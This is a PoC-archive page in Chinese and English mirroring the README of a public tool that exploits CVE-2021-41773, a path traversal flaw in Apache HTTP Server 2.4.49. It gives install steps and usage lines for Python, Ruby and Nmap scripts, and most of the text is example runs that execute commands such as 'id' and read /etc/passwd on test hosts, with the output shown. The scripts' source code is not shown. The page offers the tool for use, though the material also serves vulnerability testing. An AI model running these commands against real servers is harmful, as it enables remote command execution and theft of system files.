目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1000

100.0%
请我们喝杯咖啡

CVE-2021-41773 PoC — Apache HTTP Server 路径遍历漏洞

来源
https://github.com/mauricelambert/CVE-2021-41773
关联漏洞
标题:Apache HTTP Server 路径遍历漏洞 (CVE-2021-41773)
Description:Apache HTTP Server是美国阿帕奇(Apache)基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。 Apache HTTP Server 2.4.49版本存在路径遍历漏洞,攻击者可利用该漏洞使用路径遍历攻击将URL映射到预期文档根以外的文件。
Description
These Metasploit, Nmap, Python and Ruby scripts detects and exploits CVE-2021-41773 with RCE and local file disclosure.
介绍
# CVE-2021-41773

## Description

This script exploits CVE-2021-41773 to print file or/and execute command.

This script is available for:
 - Nmap
 - Python
 - Ruby

## Requirements

### Python

 - python3
 - python3 Standard Library

### Ruby

 - Ruby
 - Ruby Standard Library

### Install

```bash
git clone https://github.com/mauricelambert/CVE-2021-41773.git
cd CVE-2021-41773

# Python
pip install -r requirements.txt
```

### Usages

```bash
# Python
python3 CVE202141773.py [(-f/--file FILE|-c/--commands COMMAND1 COMMAND2 ...) -s/--ssl -o/--output FILE target]

# Nmap
nmap -p 80 --script RCE_CVE2021_41773 [--script-args "file=<file>" "command=<command>"] <target>

# Ruby
ruby CVE-2021-41773.rb [(-f/--file FILE|-c/--commands "COMMAND1;COMMAND2;...") -o/--output FILE target]
```

## Examples

### Python

```text
~# python3 CVE202141773.py 127.0.0.1:80
 
CVE-2021-41773  Copyright (C) 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
 
 
PythonToolsKit  Copyright (C) 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
 
[-] Target is not vulnerable.
 
~# python3 CVE202141773.py 127.0.0.1:8080
 
CVE-2021-41773  Copyright (C) 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
 
 
PythonToolsKit  Copyright (C) 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
 
[+] Target is vulnerable.
 
~# python3 CVE202141773.py -c "id" "echo H4CK" -c "cat /etc/passwd" -u "/" 127.0.0.1:8080
 
CVE-2021-41773  Copyright (C) 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
 
 
PythonToolsKit  Copyright (C) 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
 
[+] Target is vulnerable.
uid=33(www-data) gid=33(www-data) groups=33(www-data)
H4CK
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
 
~# python3 CVE202141773.py -f "/etc/passwd" -o out.txt 127.0.0.1:8080
 
CVE-2021-41773  Copyright (C) 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
 
 
PythonToolsKit  Copyright (C) 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
 
[+] Target is vulnerable.
 
~# cat out.txt
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
~# python3 CVE202141773.py -u "error" -f "/do/not/exists" 172.17.0.2
 
CVE-2021-41773  Copyright (C) 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
 
 
PythonToolsKit  Copyright (C) 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
 
[+] Target is vulnerable.
[-] Exploit is not working (HTTP error 403).
 
~# python3 CVE202141773.py -f "/do/not/exists" 172.17.0.2
 
CVE-2021-41773  Copyright (C) 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
 
 
PythonToolsKit  Copyright (C) 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
 
[+] Target is vulnerable.
[-] Exploit is not working (HTTP error 404).
 
~#
```

### Ruby

```text
~# ruby CVE-2021-41773.rb 127.0.0.1

CVE-2021-41773  Copyright (C) 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.

[+] Target: 127.0.0.1 is vulnerable

~# ruby CVE-2021-41773.rb -c "id; echo abc" 127.0.0.1

CVE-2021-41773  Copyright (C) 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.

[+] Target is vulnerable.
uid=33(www-data) gid=33(www-data) groups=33(www-data)
abc

~# ruby CVE-2021-41773.rb -f "/etc/passwd" -o abc.txt

CVE-2021-41773  Copyright (C) 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.

Host (target): 127.0.0.1
[+] Target is vulnerable.

~# cat abc.txt
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
~# 
```

### Nmap

```text
~# nmap -p 80 --script RCE_CVE2021_41773 172.17.0.2  
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-10 07:39 CET
NSE: Web service is up. Send payload...
NSE: Mode: detect only. No exploit.
NSE: Target is vulnerable.
Nmap scan report for 172.17.0.2
Host is up (0.00015s latency).

PORT   STATE SERVICE
80/tcp open  http
| RCE_CVE2021_41773: 
|   CVE-2021-41773: 
|     title: Apache CVE-2021-41773 RCE
|     state: VULNERABLE (Exploitable)
|     ids: 
|       CVE:CVE-2021-41773
|     description: 
|       The Apache Web Server contains a RCE vulnerability. This
|       script detects and exploits this vulnerability with RCE
|       attack (execute commands) and local file disclosure.
|     dates: 
|       disclosure: 
|         year: 2021
|         day: 29
|         month: 09
|     disclosure: 2021-09-29
|     refs: 
|       https://nvd.nist.gov/vuln/detail/CVE-2021-41773
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773
|_      https://github.com/mauricelambert/CVE-2021-41773

Nmap done: 1 IP address (1 host up) scanned in 0.55 seconds
~# nmap -p 80 --script RCE_CVE2021_41773 --script-args "file=/etc/passwd" 172.17.0.2
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-10 07:38 CET
NSE: Web service is up. Send payload...
NSE: Mode: exploit local file disclosure
NSE: Target is vulnerable.
NSE: Exploit is working.
Nmap scan report for 172.17.0.2
Host is up (0.00017s latency).

PORT   STATE SERVICE
80/tcp open  http
| RCE_CVE2021_41773: 
|   CVE-2021-41773: 
|     title: Apache CVE-2021-41773 RCE
|     state: VULNERABLE (Exploitable)
|     ids: 
|       CVE:CVE-2021-41773
|     description: 
|       The Apache Web Server contains a RCE vulnerability. This
|       script detects and exploits this vulnerability with RCE
|       attack (execute commands) and local file disclosure.
|     dates: 
|       disclosure: 
|         month: 09
|         year: 2021
|         day: 29
|     disclosure: 2021-09-29
|     refs: 
|       https://github.com/mauricelambert/CVE-2021-41773
|       https://nvd.nist.gov/vuln/detail/CVE-2021-41773
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773
|     exploit output: 
|        
| root:x:0:0:root:/root:/bin/bash
| www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
|_

Nmap done: 1 IP address (1 host up) scanned in 0.56 seconds
~# nmap -p 80 --script RCE_CVE2021_41773 --script-args "command=id" 172.17.0.2
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-10 07:32 CET
NSE: Web service is up. Send payload...
NSE: Mode: exploit RCE
NSE: Target is vulnerable.
NSE: Exploit is working.
Nmap scan report for 172.17.0.2
Host is up (0.00087s latency).

PORT   STATE SERVICE
80/tcp open  http
| RCE_CVE2021_41773: 
|   CVE-2021-41773: 
|     title: Apache CVE-2021-41773 RCE
|     state: VULNERABLE (Exploitable)
|     ids: 
|       CVE:CVE-2021-41773
|     description: 
|       The Apache Web Server contains a RCE vulnerability. This
|       script detects and exploits this vulnerability with RCE
|       attack (execute commands) and local file disclosure.
|     dates: 
|       disclosure: 
|         day: 29
|         year: 2021
|         month: 09
|     disclosure: 2021-09-29
|     refs: 
|       https://nvd.nist.gov/vuln/detail/CVE-2021-41773
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773
|       https://github.com/mauricelambert/CVE-2021-41773
|     exploit output: 
|        
| uid=1(daemon) gid=1(daemon) groups=1(daemon)
|_

Nmap done: 1 IP address (1 host up) scanned in 0.63 seconds
~# 
```

## Exit codes

 - 0: Target is vulnerable
 - 1: Target is not vulnerable
 - 127: State unknown

## Links

 - [nvd](https://nvd.nist.gov/vuln/detail/CVE-2021-41773)
 - [Pydoc and examples](https://mauricelambert.github.io/info/python/security/CVE202141773.html)
 - [Rdoc](https://mauricelambert.github.io/info/ruby/security/CVE-2021-41773/CVE202141773.html)
 - [Payload and docker environment](https://github.com/blasty/CVE-2021-41773)

## Licence

Licensed under the [GPL, version 3](https://www.gnu.org/licenses/).
文件快照

 [4.0K]  /data/pocs/df5938a4e2880047d6f492846c2d4c15526bc4ee
├── [8.1K]  apache_rce_cve2021_41773.md
├── [ 12K]  apache_rce_cve2021_41773.rb
├── [8.8K]  CVE202141773.py
├── [5.0K]  CVE-2021-41773.rb
├── [ 35K]  LICENSE.txt
├── [7.6K]  RCE_CVE2021_41773.nse
├── [9.2K]  README.md
└── [  15]  requirements.txt

0 directories, 8 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →